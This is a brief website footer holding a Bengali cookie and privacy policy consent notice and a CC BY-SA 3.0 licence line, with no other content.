আমাদের সাইট ব্যবহার করে, আপনি স্বীকার করেছেন যে আপনি আমাদের কুকি নীতি এবং গোপনীয়তা নীতিটি পড়েছেন এবং বুঝতে পেরেছেন ।
Licensed under cc by-sa 3.0 with attribution required.